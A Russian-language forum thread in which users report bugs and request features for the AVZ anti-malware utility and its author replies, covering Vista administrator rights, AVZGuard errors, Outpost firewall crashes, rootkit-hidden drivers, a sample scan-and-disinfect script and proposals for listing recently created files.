Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## Зайцев Олег

> Олег, Вы сообщите о выходе исправленной версии?


Да, конечно. Просто я затягиваю выход обновления пока активно обнаруживаются баги

----------


## santy

Олег, возможно ли в xml-логе исследования использовать одинаковый набор полей для разных категорий исследования:process, dll, drivers, services и др.? С тем, чтобы возможно было логи добавлять в базу данных и проводить сравнительный анализ_обработку для различных хостов.

----------


## Зайцев Олег

> Олег, возможно ли в xml-логе исследования использовать одинаковый набор полей для разных категорий исследования:process, dll, drivers, services и др.? С тем, чтобы возможно было логи добавлять в базу данных и проводить сравнительный анализ_обработку для различных хостов.


А для этого не нужен идентичный набор полей ... файл кстати описывается идентичным набором атрибутов, а таскать поле PID скажем в списке BHO - несерьезно. делается это так:
1. Заводится несколько таблиц - по одной на каждую категорию
2. Заводится таблицы:
2.1 Справочник категория (поля: код, имя категории)
2.2 Справочник параметров (поля: код, имя категории, тип). Ссылочная целостность на таблицу 2.1
2.3 Справочник "параметры категорий" (поля: код категории, код параметра), ссылочная целостность на 2.1 и 2.2
2.4 таблица "исследования". там код исследования, дата исследования, примечания, признаки ... 
2.5 заводим хранилище - таблица с полями: код исследования, код категории, код строки, код параметра, значение параметра). Ссылочная целостность на 2.1, 2.2 и 2.4, логический контроль по 2.3. И там храним все, что нужно ....
так что все просто ...

----------


## Jef239

> Да, конечно. Просто я затягиваю выход обновления пока активно обнаруживаются баги


А тестеры затягивают тестирование до выхода новой версии.  :Smiley:  По принципу "три бага нашли - ждём новой версии"

----------


## Макcим

Если честно, хочется по скорее исправленный релиз. Не работающая DeleteService - это серьезно для "Помогите".

----------


## LeeDRuid

А АВЗ совместим с 64 битной версией винды?
У меня не устанавливаются драйвера и не включается гвард, не проходит скрипт на поиск руткитов из за ошибки:
"Поиск перехватчиков API, работающих в KernelMode
 Ошибка - не найден файл (C:\WINDOWS\system32\ntoskrnl.exe)"

Я не могу проверить, т.к. система 64битная тока дома) стандартный Скрипт на удаление драйверов я выполнял. Может надо найти старую версию? И выполнить в ней? Где то на первых страницах написали что не важна версия. И где мне в случае необходимости скачать старую? В здешних загрузках как я понимаю тока последняя версия.
Заранее благодарен. "Респект и уважуха" за прогу)

----------


## drongo

> А АВЗ совместим с 64 битной версией винды?


нет  :Wink:  это указано в справке программы, почитайте на досуге

----------


## Surfer

Возможно ли выгружать/удалять что-либо из "Модуля пространства ядра" ?
Иногда,думаю, бывает нужно.

----------


## Зайцев Олег

> Возможно ли выгружать/удалять что-либо из "Модуля пространства ядра" ?
> Иногда,думаю, бывает нужно.


Это технически невозможно ... выгрузка некоего модуля ядра, на содаржащего потоки, обрабатывающего какие-то запросы (про перехват и фильтры типа фильтра файловой системы я вооще молчу) приведет к BSOD. Драйвер можно "вежливо попросить" выгрузиться, если он пожелает это сделать - то выгрузится. Это есть в менеджере служб и драйверов.

----------


## Surfer

> Это технически невозможно ... выгрузка некоего модуля ядра, на содаржащего потоки, обрабатывающего какие-то запросы (про перехват и фильтры типа фильтра файловой системы я вооще молчу) приведет к BSOD. Драйвер можно "вежливо попросить" выгрузиться, если он пожелает это сделать - то выгрузится. Это есть в менеджере служб и драйверов.


Как раз одна из потенциальных дырок в avz. Это возвращаясь к руткитам.  :Smiley: 
Драйвер isdrv122.sys от последнего IceSword'a применяет несколько руткит-технологий чтобы скрыть присутствие в системе.
Его невидно нигде, кроме "пространства ядра".
Что помешает использовать подобное в реальных зловредах ?

----------


## Kuzz

> Как раз одна из потенциальных дырок в avz. Это возвращаясь к руткитам. 
> Драйвер isdrv122.sys от последнего IceSword'a применяет несколько руткит-технологий чтобы скрыть присутствие в системе.
> Его невидно нигде, кроме "пространства ядра".
> Что помешает использовать подобное в реальных зловредах ?


Это "проблема" не AVZ. Это особенность ядерной части Windows.
Идеология примерно такая: если модуль не зарегистрировал в системе функции собственной "выгрузки",
значит этого нельзя сделать без последствий для системы.
Другой вопрос - кто и как пользуется этой особенностью..
Тем более, что никто не может лучше автора драйвера знать как правильно выгрузить его "творение".

----------


## XL

> Его невидно нигде, кроме "пространства ядра".
> Что помешает использовать подобное в реальных зловредах ?


А оно уже используется. К примеру в небезызвестном rootkit.agent.ea
Да и не только в нем. Последние версии bulknet'а ведут себя аналогично.

----------


## Surfer

Собственно это был простейший пример, есть ещё более извращённые  :Smiley:

----------


## Jef239

> Как раз одна из потенциальных дырок в avz. Это возвращаясь к руткитам. 
> Драйвер isdrv122.sys от последнего IceSword'a применяет несколько руткит-технологий чтобы скрыть присутствие в системе.
> Его невидно нигде, кроме "пространства ядра".
> Что помешает использовать подобное в реальных зловредах ?


Модуль драйвера, видимый лишь через пространство модулей ядра, нужно удалять через BootCleaner. А что, сейчас нет удобного способа это сделать?
Или речь о том, что нужно не удаление "Насовсем", а какое-то временное переименование?

----------


## XL

Если драйвер малвары загружается раньше, чем это делает bootclean драйвер AVZ, то удалить малвару не получится. Вся беда в том, что они и грузятся раньше. Но по словам Олега в закрытой ветке противоядие на подходе.

----------


## vaber

> Как раз одна из потенциальных дырок в avz. Это возвращаясь к руткитам. 
> Драйвер isdrv122.sys от последнего IceSword'a применяет несколько руткит-технологий чтобы скрыть присутствие в системе.
> Его невидно нигде, кроме "пространства ядра".
> Что помешает использовать подобное в реальных зловредах ?


Да? И какие же технологии он применяет для маскировки?
З.Ы. Драйвер этого антируткита не маскируется ни впамяти, ни на диске. Более того - он на диске не существует. И ключи после регистрации и загрузки он удаляет из системного реестра. Применять это малварам не имеет смысла, т.к. после ребута они банально не загрузятся.

----------


## PavelA

что-то потерялось  :Sad:  Строчка из лога: http://virusinfo.info/showthread.php?t=15676



> $AVZ0637: "NWLink IPX/SPX/NetBIOS-совместимый транспортный протокол" --> $AVZ0623 C:\WINDOWS\System32\nwprovau.dll

----------


## Зайцев Олег

> что-то потерялось  Строчка из лога: http://virusinfo.info/showthread.php?t=15676


Да, это баг. Исправлено.

----------


## drongo

http://virusinfo.info/showthread.php?t=15723

C:\WINDOWS\system32\dllcache\winlogon.exe- нет влоге AVZ, но есть в hijackthis

----------


## rubin

http://virusinfo.info/showthread.php?t=15686

AVZ не видит C:\WINDOWS\system32\DefLib.sys

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## Зайцев Олег

Итак, вышло первое обновление AVZ - оно приползает само через автоапдейт баз. Это обновление локализатора, в частности в области английского языка - *NickGolovko* выверил перевод, я соответственно обновил базы локализатора.

----------


## rubin

Кроме перевода ничего не менялось?
Если нет - когда ждать остальных правок?

----------


## tar

> Итак, вышло первое обновление AVZ - .


 
что-то ревизор не работает. Видно, у меня одного

----------


## Bratez

ExecuteSysClean не отрабатывает ключ автозапуска
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\System

----------


## zerocorporated

Редактор скриптов avz не знает функцию ExecuteWizard

----------


## Alex_Goodwin

после запуска гуарда,  запускаем как доверенное: Вложение 26773

----------


## Макcим

Можно сделать чтобы стандартные скрипты №2 и №3 не выполнялись до тех пор, пока пользователь не отключит восстановление системы? С соответствующим алертом конечно.

----------


## Alex_Goodwin

Ага, а пользователь не сможет и останется без лечения. Лучше просто в стандартный скрипт добавить отключение восстановления системы, с уведомлением о необходимости включения после лечения.

----------


## Макcим

Можно и так.

*Добавлено через 5 часов 24 минуты*

В связи с темой "Удаленный доступ" возникло предложение. А что если в стандартных скриптах исследования системы выводить драйвера не по API, а по анализу реестра? Отфильтруется львиная доля мусора.

----------


## evilone_

Подскажите правильные ключи для запуска чтобы программа после старта
-обновила базы
-проверила все что только можно и на все что только можно 
-поличила или почистила
-записала файлик отчета на рабочий стол
-закрылась
а то что-то у меня не получается совсем никак

и еще такой маленький вопрос, касательно плагина к thebat для работы антивирусной проверки нужно чтобы работало само приложение AVZ или только чтобы правильно был указан путь к програмной папке?
как-то можно проверить работоспособность этого плагина? может какой-то тестовый вирус с письмом во вложении или типтого?
Спасибо

----------


## zerocorporated

> Подскажите правильные ключи для запуска чтобы программа после старта
> -обновила базы
> -проверила все что только можно и на все что только можно 
> -поличила или почистила
> -записала файлик отчета на рабочий стол
> -закрылась


В встроеной справке avz есть нужная информация.

Можно например создать скрипт avz в папке с программой и запускать так *avz.exe Script=1.avz*

А вот в этот скрипт вписать нужные команды.

----------


## Зайцев Олег

> Подскажите правильные ключи для запуска чтобы программа после старта
> -обновила базы
> -проверила все что только можно и на все что только можно 
> -поличила или почистила
> -записала файлик отчета на рабочий стол
> -закрылась
> а то что-то у меня не получается совсем никак
> 
> и еще такой маленький вопрос, касательно плагина к thebat для работы антивирусной проверки нужно чтобы работало само приложение AVZ или только чтобы правильно был указан путь к програмной папке?
> ...


Плагину нужна только папка Base от AVZ, сам AVZ ему не нужен. Проверить работоспособность очень просто - взять любого зловреда, который ловится AVZ и послать его самому себе, приаттачив к письму в чистом виде или в архиве - плагин должен его поймать.

Насчет ключей - они конечно есть, но поставленную задачу на 100% не решит. А вот скрипт - решит ... т.е. вызываем avz.exe script=имя_файла_скрипта, далее делаем текстовый файл, в нем скрипт с командами настройки AVZ, проверки, лечения сохранения лога - что-то типа такого:


```
begin
 // если сканирование не завершилось за 10 минут, прервать его
 ActivateWatchDog(10*60);
 // Настройка AVZ
 SetupAVZ('UseQuarantine=Y'); // Включить карантин
 SetupAVZ('Scan=C:\');        // Проверять диск C:\
 SetupAVZ('DelVir=Y');        // Включить лечение
 SetupAVZ('EvLevel=3');       // Эвристика на максимум
 SetupAVZ('ExtEvCheck=Y');    // Расширенный анализ включен
 // Запуск сканирования
 RunScan;
 // Сохранение протокола 
 SaveLog('avz_log.txt');          
 // Завершение работы AVZ
 ExitAVZ;
end.
```

Подобные примеры скриптов есть в разделе 15.42 документации, в разделе 15 описаны команды скрипт-языка, в разделе 13 - параметры командной строки. Собственно вот сама документация http://www.z-oleg.com/secur/avz_doc/

----------


## evilone_

может у кого-то есть уже готовый такой или похожий скрипт? а то не в зуб ногой в скриптописанине
нет ли какой-то "библиотеки" уже готовых пользовательских скриптов?

----------


## Зайцев Олег

> может у кого-то есть уже готовый такой или похожий скрипт? а то не в зуб ногой в скриптописанине
> нет ли какой-то "библиотеки" уже готовых пользовательских скриптов?


См. выше + раздел 15.42 документации - это и есть библиотека типовых скриптов

----------


## NickGolovko

С G2G сообщение: не активируется AVZGuard на Vista, ошибка C0000001. Что ответить?

----------


## Зайцев Олег

> С G2G сообщение: не активируется AVZGuard на Vista, ошибка C0000001. Что ответить?


Vista 32 или 64 бита ? SP1 на нее установлен или нет ? Запуск AVZ ведется по правой кнопке с правами админа ? 
Я подозреваю, что на ПК успели SP1 установить

----------


## Макcим

Справка AVZ http://z-oleg.com/secur/avz_doc/scri...cutewizard.htm



> ADBName - имя базы. Допустим*ы* следующие имена:
> TSW - база мастера поиска и устранения проблем
> BT - база проверки настроек безопасности браузеров и системы в целом
> 
> PRT - база мастера для чистки из системы данных, влияющих на приватность (протоколы, журналы, кукизы и т.п.)


Может слово "кукизы" заменить на более привычное "Cookies"?

----------


## RiC

Ещё баг с  Viscta - http://forum.kaspersky.com/index.php?showtopic=56998 судя по логу отвалился антируткит в полном составе.

----------


## Jef239

А что с выходом билда, в котором хоть что-то исправлено будет?

----------


## Зайцев Олег

> Ещё баг с Viscta - http://forum.kaspersky.com/index.php?showtopic=56998 судя по логу отвалился антируткит в полном составе.


Судя по логу у юзера Vista, а пользоваться он ей не умеет ... ошибка C0000061 означает банальную нехватку прав, так как AVZ запущен как обычная программа, а не как приложение с правами администратора. Нужно срочно делать FAQ с картинками на тему "Как запускать утилиты исследования и лечения системы на Vista". Я постаряюсь сегодня сдалать таковое, дальше растиражируем его (на мой сайт в FAQ AVZ, на форум ЛК и т.п.)

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## rav

Олег, а может, проще вставить манифест в ресурсы с нужными правами доступа?

----------


## zerocorporated

Возможно ошибка... (Или я ошибаюсь).
Если выполнить скрипт в avz:


```
begin
 SetupAVZ('HiddenMode=2');
end.
```

То значок avz появляется в трее, а само окно программы показывается...

Только такой запуск *avz.exe HiddenMode=2* проходит верно... Это баг?

----------


## Зайцев Олег

> Возможно ошибка... (Или я ошибаюсь).
> Если выполнить скрипт в avz:
> 
> 
> ```
> begin
>  SetupAVZ('HiddenMode=2');
> end.
> ```
> ...


Предполагается, что HiddenMode указывается именно как параметр, тогда все сработает нормально ... его применение в скрипте допустимо, но отработает это не до конца (так как окно уже отображено ....)

----------


## AndreyKa

При использовании функции RegKeyStrParamWrite изменяется тип параметра реестра с REG_EXPAND_SZ на REG_SZ.
В результате, вместо переменных окружения не подставляются реальные пути и система не находит нужный файл.
http://virusinfo.info/showpost.php?p=163668&postcount=4

----------


## Зайцев Олег

> При использовании функции RegKeyStrParamWrite изменяется тип параметра реестра с REG_EXPAND_SZ на REG_SZ.
> В результате, вместо переменных окружения не подставляются реальные пути и система не находит нужный файл.
> http://virusinfo.info/showpost.php?p=163668&postcount=4


Да, и это не изменить. Вывод - сегодня же добавлю функцию RegKeyExpandStrParamWrite.

----------


## kozakoff

> Нужно срочно делать FAQ с картинками на тему "Как запускать утилиты исследования и лечения системы на Vista". Я постаряюсь сегодня сдалать таковое, дальше растиражируем его (на мой сайт в FAQ AVZ, на форум ЛК и т.п.)


Дочка купила новый комп с Вистой. Продавец-"Мастер" помимо ОС установил ломаную прогу Офиса с кучей Адварей. Не могу почистить из System Volume Information ни БитДефендером ни АВЗ.Скорей всего по причине что не знаю как входить с правами Админа.
Олег спасибо за "Вопросы с картинками" буду ждать.

----------


## XL

> Не могу почистить из System Volume Information


Просто отключите и включите восстановление системы. Содержимое убьется само.

А запустить AVZ с правами администратора под Vista легко. Правый клик на исполняемом файле avz, затем выбираете *Запуск от имени администратора* во всплывающем меню, соглашаетесь на вопрос User Account Control и все.

----------


## kozakoff

Спасибо.
Прочитал внимательно справку по работе с Вистой, на сайте Олега.
Так и сделал. Зашел под правами Админа и руками вычестил.Отключение востановления системы не помогало,папку Системную видел а войти в неё не мог.После входа с правами вычистилось.
АВЗ рулит.

----------


## Макcим

Если на компьютере установлен Outpost, AVZ валит машину в BSOD. Причем выгрузка Outpost'а не помогает!

----------


## santehnik

> Если на компьютере установлен Outpost, AVZ валит машину в BSOD. Причем выгрузка Outpost'а не помогает!


Может быть это зависит от другого софта? Только что проверил: 2 машины с XP SP2 (одна чистая, другая замусоренная игрушками), 1 с W2K SP4 и заплатками на ноябрь месяц, все с Outpostом - BSOD не наблюдается.

----------


## borka

> все с Outpostом - BSOD не наблюдается.


Может, есть разница - Outpost Firewall или Outpost Security Suite?

----------


## santehnik

> Может, есть разница - Outpost Firewall или Outpost Security Suite?


 У меня Firewall, Security Suite не ставил (не понравился изначально).

----------


## Макcим

> Может быть это зависит от другого софта? Только что проверил: 2 машины с XP SP2 (одна чистая, другая замусоренная игрушками), 1 с W2K SP4 и заплатками на ноябрь месяц, все с Outpostом - BSOD не наблюдается.


Какая версия Outpost? Самозащита включена? Запускали поиск и нейтрализацию руткитов в AVZ?

----------


## santehnik

> Какая версия Outpost? Самозащита включена? Запускали поиск и нейтрализацию руткитов в AVZ?


2.7, включена, запускал. На одной из машин с XP был отключен ctfmon. Включил его, прогнал AVZ 5 раз, 3 раза машина ушла в ресет. Но ctfmon.exe известный глюкогенератор;-)

----------


## Muffler

*rav*, +1

----------


## Макcим

> 2.7, включена, запускал. На одной из машин с XP был отключен ctfmon. Включил его, прогнал AVZ 5 раз, 3 раза машина ушла в ресет. Но ctfmon.exe известный глюкогенератор;-)


Проблема появилась с последней версией Outpost'а.

----------


## NickGolovko

Олег, насчет AVZGuard на Vista:

- 32-bit
- SP1 установлен
- запускалось с правами админа из контекстного меню.

----------


## Зайцев Олег

> Олег, насчет AVZGuard на Vista:
> 
> - 32-bit
> - SP1 установлен
> - запускалось с правами админа из контекстного меню.


*SP1 установлен* - вот и причина. Я сегодня утром скачал SP1 для висты, сегодня установлю на моих ПК с вистой, если они это переживут, то подкручу Guard.
Второй момент - где у нас лежит последний EN хелп ? Я хочу прикрутить его к сборке, так как отлов глюков завершен и релиз готов.

*Добавлено через 2 минуты*




> Олег, а может, проще вставить манифест в ресурсы с нужными правами доступа?


В принципе это вариант ... я прицепил к AVZ соответствующий манифест, что сняло проблемы у юзеров, которые не знают, как запускать подоюные утилиты - хотя теперь при запуске приходится подтверждать в окне UAC запуск с расширенными правами - но это уже мелочь

----------


## RiC

> отлов глюков завершен и релиз готов.


Вчера "нарвался" - в Custom Script подглюкивает форма загрузки скрипта из файла, выставь правильно расширения файлов по умолчанию (*.AVZ  ?)  и просмотр всех файлов, а то имя скрипта нужно вбивать руками полностью чтобы он загрузился. Ну и аналогично в "сохранить скрипт".

*Добавлено через 18 минут*

И ещё небольшой глючек в скриптовом "движке" - попытка вызова деструктора несуществующего обьекта приводит к ошибке, по которой невозможно понять что именно произошло или, в редких случаях, к синему экрану.

----------


## evilone_

пожелание к интерфейсу программы  :Smiley:  ну очень не удобно
если не сложно все менеджеры в одном окне со вкладками на каждый сервис а то пока найдешь забудешь что ищешь как например это сделано в autoruns от sysinternals

или например слева в виде списка ссылок или кнопок вынести весь перечень менеджеров и утилит, чтобы не залазить в меню каждый раз, было бы намного удобнее

п.с.
- подскажите можно ли программой заблокировать изменение автозагрузки(защита от записи)
- установка удаление служб (например выгрузка указанной службы - т.е. если что-то к примеру будет выгружать службу фаервола или антивируса будет либо отказ в доступе либо автоматический перезапуск)
- блокировка стартовой страницы и всех настроек броузера, хостс
- защита записи(удаление) на самые критические файлы по типу svchost.exe и ему 
подобные?

нужно ли для этого работающая программа - т.е. блокирует ли пока работает или можно заблокировать и отключиться?
спс

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## sam52

попытался загрузить последнюю версию авз и не смог. то есть утилита вроде грузится, но при попытке распаковать из зип-архива в окне программы вместо кирилицы появляется вот такое безобразие: [?6345?]. причём, слова, набранные латинским шрифтом открываются нормально пробовал несколько раз-результат один. предыдущие версии авз грузились нормально. да и сейчас старые версии (есть даже на диске- купил вместе с книгой) грузятся нормально, но, разумеется, не обновляются. Да и другие проги грузятся нормально в т.ч. и антивирус нод32.ну вот. И что бы это могло означать?

----------


## Зайцев Олег

> попытался загрузить последнюю версию авз и не смог. то есть утилита вроде грузится, но при попытке распаковать из зип-архива в окне программы вместо кирилицы появляется вот такое безобразие: [?6345?]. причём, слова, набранные латинским шрифтом открываются нормально пробовал несколько раз-результат один. предыдущие версии авз грузились нормально. да и сейчас старые версии (есть даже на диске- купил вместе с книгой) грузятся нормально, но, разумеется, не обновляются. Да и другие проги грузятся нормально в т.ч. и антивирус нод32.ну вот. И что бы это могло означать?


Скачав архив требуется его распаковать, а не запускать AVZ прямо из архива.

*Добавлено через 2 минуты*




> пожелание к интерфейсу программы  ну очень не удобно
> если не сложно все менеджеры в одном окне со вкладками на каждый сервис а то пока найдешь забудешь что ищешь как например это сделано в autoruns от sysinternals
> 
> или например слева в виде списка ссылок или кнопок вынести весь перечень менеджеров и утилит, чтобы не залазить в меню каждый раз, было бы намного удобнее
> 
> п.с.
> - подскажите можно ли программой заблокировать изменение автозагрузки(защита от записи)
> - установка удаление служб (например выгрузка указанной службы - т.е. если что-то к примеру будет выгружать службу фаервола или антивируса будет либо отказ в доступе либо автоматический перезапуск)
> - блокировка стартовой страницы и всех настроек броузера, хостс
> ...


Менеджеры не будут объединяться в одно окно, в этом нет надобности. Сводные данные о всем попадают в исследование системы, в нем есть интерактив для создания скрипта, в частности для карантина и удаления файлов
AVZ ничего блокировать и защищать не может, так как он расчитан на запуск и исследование, а не на защиту в реальнмо времени

*Добавлено через 3 минуты*




> Вчера "нарвался" - в Custom Script подглюкивает форма загрузки скрипта из файла, выставь правильно расширения файлов по умолчанию (*.AVZ ?) и просмотр всех файлов, а то имя скрипта нужно вбивать руками полностью чтобы он загрузился. Ну и аналогично в "сохранить скрипт".
> 
> *Добавлено через 18 минут*
> 
> И ещё небольшой глючек в скриптовом "движке" - попытка вызова деструктора несуществующего обьекта приводит к ошибке, по которой невозможно понять что именно произошло или, в редких случаях, к синему экрану.


Глюк в форме загрузки уже пойман и исправлен. Насчет вызове деструктора - да, тут есть проблема - если объект не инициализирован, то возникнет исключение.

----------


## NickGolovko

> Второй момент - где у нас лежит последний EN хелп ? Я хочу прикрутить его к сборке, так как отлов глюков завершен и релиз готов.


http://virusinfo.info/showthread.php...ewpost&t=14484

вот здесь. Но там нет раздела по скриптам, его нужно добавить из старого хелпа.

----------


## leadbelly

база создается нормально 
пытаюсь проверить
выдает-
Запущено сравнение 
База ревизора загружена, дата создания 18.12.2007 23:03:20
Сравнение ведется в стандартном режиме
Сравнение успешно завершено

причем сразу ничего не сравнивая 
пытался файлы добавлять там всякие расширения указывать 
то же самое

----------


## zerocorporated

> база создается нормально 
> пытаюсь проверить
> выдает-
> Запущено сравнение 
> База ревизора загружена, дата создания 18.12.2007 23:03:20
> Сравнение ведется в стандартном режиме
> Сравнение успешно завершено
> 
> причем сразу ничего не сравнивая 
> ...


Поставил создавать стандартным способом базу всего диска С и при сравнении Диск-> База  за пол секунды сравнило. Удалил несколько exe файлов с диска - также... и изменений не показывает.

----------


## leadbelly

я и весь диск пробовал и по директориям и базу с другого компа результат всегда сразу и "ОК"

----------


## tar

ревизор не работает, тут и экспериментировать не стоит

----------


## zerocorporated

Может сделать, чтоб avz не отключала автозапуск с CD, а отключала автозапуск со ВСЕХ дисков? Очень часто заражаются со съемных носителей...

----------


## Jef239

> Проблема появилась с последней версией Outpost'а.


С какой именно? Можешь точные данные дать? Могу в Agnitum багрепорт дать.

----------


## NickGolovko

Олег,

в комплексном решении Deckard's System Scanner, которое иногда используют зарубежные специалисты, есть вывод в лог списка файлов, созданных в течение последних Х дней (не знаю, чему равен Х). Быть может, стоит позаимствовать идею для исследования системы? В конце концов, это один из методов обнаружения malware без инструментов - поиск файлов потенциально опасных расширений, созданных в течение последних дней.

----------


## RiC

> Олег, в комплексном решении Deckard's System Scanner, которое иногда используют зарубежные специалисты, есть вывод в лог списка файлов, созданных в течение последних Х дней .


X обычно равен месяцу, Winpfind, ComboFix тоже имеют подобные поисковики, из них можно "выловить" всякие не исполняемые напрямую файлы типа ini и прочего мусора.
Можно накатать подобный отчёт прямо на скрипте, возможностей в языке для этого хватит.

----------


## Зайцев Олег

> Олег,
> 
> в комплексном решении Deckard's System Scanner, которое иногда используют зарубежные специалисты, есть вывод в лог списка файлов, созданных в течение последних Х дней (не знаю, чему равен Х). Быть может, стоит позаимствовать идею для исследования системы? В конце концов, это один из методов обнаружения malware без инструментов - поиск файлов потенциально опасных расширений, созданных в течение последних дней.


Это не сложно ... так как уже реализовано (поиск файла на диске - если там поставить птички на исключение известных файлов и задать дату создания как системную - N, то мы и получим это ...). Или в скрипте это можно сделать, в хелпе есть пример.
Но:
1. Как это запускать и когда (меню, отдельная команда скрипт-движка, стандартный скрипт) ?
2. Куда и как сохранять результат (исследование системы, отдельный лог)
3. Как быть, если таковых файлов обнаружится огромное количество ?

----------


## Макcим

> С какой именно? Можешь точные данные дать? Могу в Agnitum багрепорт дать.


Agnitum Outpost Firewall PRO (32-bit) 6.0 Какой же баг, если это фича, не даёт AVZ снять перехваты даже после выгрузки из трея.

----------


## Jef239

> Agnitum Outpost Firewall PRO (32-bit) 6.0 Какой же баг, если это фича, не даёт AVZ снять перехваты даже после выгрузки из трея.


Так не даёт снять перехваты (это фича) или комп падает при простом сканировании на руткиты?

*Добавлено через 3 минуты*

OPF 6.0 - трёхуровневый, драйвер-сервис-оболочка.  Выгрузка из трея оболочки действительно ничего не даст. Как минимум, нужно остановить сервис и отключить драйвера в настройках сетевых карт.
А вообще-то по реакции на попытку отключения зловредом, аутпост считается самым надёжным. То есть либо не отключается, либо падает, но оставляя сеть закрытой.

----------


## Макcим

Вот в этой теме http://virusinfo.info/showthread.php?t=15997 создается впечатление, что руткит не даёт AVZ нормально работать, оказывается что этот руткит есть OPF...

----------


## NickGolovko

> Но:
> 1. Как это запускать и когда (меню, отдельная команда скрипт-движка, стандартный скрипт) ?
> 2. Куда и как сохранять результат (исследование системы, отдельный лог)
> 3. Как быть, если таковых файлов обнаружится огромное количество ?


Наверное, мне стоило подчеркнуть слова "исследование системы" в моем предложении.  :Smiley:  Поиск файлов на диске я и сам для этой цели использовал. Я хотел предложить еще одну таблицу в результатах исследования системы (Стандартные скрипты 2 и 3, простое Исследование системы). Если Х невелик (7 дней, положим) и ищутся только опасные файлы (SYS, EXE, DLL), то количество файлов может быть равно нулю. А вот поиск *всех* созданных за это время файлов безотносительно к расширению действительно даст большой список в несколько сот строк: тут и базы антивируса, и временные файлы, и prefetch...

----------


## Jef239

> Вот в этой теме http://virusinfo.info/showthread.php?t=15997 создается впечатление, что руткит не даёт AVZ нормально работать, оказывается что этот руткит есть OPF...


Ну в этой теме такой зоопарк, что может быть всё, что угодно.
А вообще в OPF есть антируткит. И много разногопротиводействия выгрузке. А может быть сделать вариант стандартного скрипта без выгрузки OPF? То есть  выгружать все руткиты, кроме известных FireWall и антивирусных ядер?

----------


## Pili

Есть в DSS и в ComboFix, 
в DSS выглядит так



> - Files created between 2007-12-01 and 2008-01-01 -----------------------------
> 
> 2008-01-01 20:38:50 218112 --a------ C:\Program\Annette.exe <Not Verified; Soeperman Enterprises Ltd.; HijackThis>
> 2008-01-01 19:43:40 0 d-------- C:\VundoFix Backups
> 2007-12-27 19:45:08 8643 --ahs---- C:\WINDOWS\System32\qpqss.ini2
> 2007-12-27 19:39:36 24288 --a------ C:\WINDOWS\System32\rqrqqnn.dll
> 2007-12-20 03:47:21 0 d-------- C:\Documents and Settings\Annette\Application Data\MailFrontier
> 2007-12-11 00:45:09 0 d-------- C:\Program\Common Files


в ComboFix выглядит так



> ((((((((((((((((((((((((( Files Created from 2007-12-02 to 2008-01-02 )))))))))))))))))))))))))))))))
> .
> 
> 2008-01-02 17:55 . 2000-08-31 08:00 51,200 --a------ C:\WINDOWS\NirCmd.exe
> 2007-12-27 19:39 . 2007-12-27 19:39 24,288 --a------ C:\WINDOWS\system32\rqrqqnn.dll
> 2007-12-20 03:47 . 2007-12-20 03:47 <KAT> d-------- C:\Documents and Settings\Annette\Application Data\MailFrontier
> 2007-12-11 00:45 . 2007-12-11 00:45 <KAT> d-------- C:\Program\Common Files


Плюс есть ещё 



> -- Find3M Report ---------------------------------------------------------------
> 
> 2008-01-01 20:46:15 3820 --a------ C:\Program\hijackthis.log <HIJACK~1.LOG>
> 2008-01-01 20:46:03 0 --a------ C:\WINDOWS\System32\scarjssp.dat
> 2008-01-01 20:46:03 5977 --a------ C:\WINDOWS\System32\nvwdmcpb.dat
> 2008-01-01 20:46:03 0 --a------ C:\WINDOWS\System32\dx8vsnhm.dat
> 2008-01-01 20:46:03 7167 --a------ C:\WINDOWS\System32\dpnhujnp.dat
> 2008-01-01 20:45:21 586 --a------ C:\WINDOWS\System32\fsuswp.dat
> 2008-01-01 20:45:20 5658 --a------ C:\WINDOWS\System32\shscraph.dat
> 2008-01-01 20:45:20 10155 --a------ C:\WINDOWS\System32\kbdjpmi.dat


+ есть отчеты по ошибкам из Event Log
имхо:
1. запускать отдельным стандартным скриптом
2. отдельный лог
3. фильтровать по датам, расширениям, базе безопасных, цифр. подписям.

----------


## NickGolovko

> имхо:
> 1. запускать отдельным стандартным скриптом
> 2. отдельный лог


А тогда какой смысл? Проще сказать пользователю "поищите файлы на диске с такими-то параметрами". Такие данные, на мой взгляд, как раз и должны быть только в общем логе исследования системы. Или в DSS и ComboFix это тоже запускается отдельно от основного исследования?  :Wink: 

Мне такая дополнительная таблица представляется преследующей примерно те же цели, что и список подозрительных файлов в конце исследования системы.

----------


## Зайцев Олег

> А тогда какой смысл? Проще сказать пользователю "поищите файлы на диске с такими-то параметрами". Такие данные, на мой взгляд, как раз и должны быть только в общем логе исследования системы. Или в DSS и ComboFix это тоже запускается отдельно от основного исследования? 
> 
> Мне такая дополнительная таблица представляется преследующей примерно те же цели, что и список подозрительных файлов в конце исследования системы.


Имхо - воткнуть это в исследование, отдельной таблицей, файлы искать только в корне диска и системной папке, без повторов, исключая известные AVZ или прошедшие контроль MS, измененные или созданные за последние 7-10 дней.

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## Макcим

> файлы искать только в корне диска и системной папке


Может расшириться на весь системный диск?

----------


## Bratez

Олег, похоже "проблемный Мастер" не исправляет таймаут завершения служб, проверьте пожалуйста.

----------


## zerocorporated

Баг в avz: При просмотре в менеджере процессов например если отсортировать все данные по какой либо колонки, то колонка что была выделена собьется. То есть после отсортировки данные не обновляются в таблице и видно список модулей dll старого процесса

----------


## Зайцев Олег

> Может расширится на весь системный диск?


Я думаю не стоит - я всегда рассматриваю любое новшество как совокупность затрат усилий на реализацию (тут это не критично), затрат времени и ресурсов на выполнение (очень критично) и результата. Сканируя весь диск я конечно могу что-то найти, но если вдруг попадется юзер с диском на 2 терабайта, что тогда !? Его сканирование может занять в лучшем случае часы (а если у него неотключенный AV монитор - сутки).

----------


## zerocorporated

> Может расшириться на весь системный диск?


Предлагал уже сделать такой поиск: то есть поиск файлов там где они должны находится... ну например драйверов в папке system32 system и т.д.  файлов exe и dll в папке драйверов. Поиск потенциально опасных файлов во временных директориях.

----------


## Pili

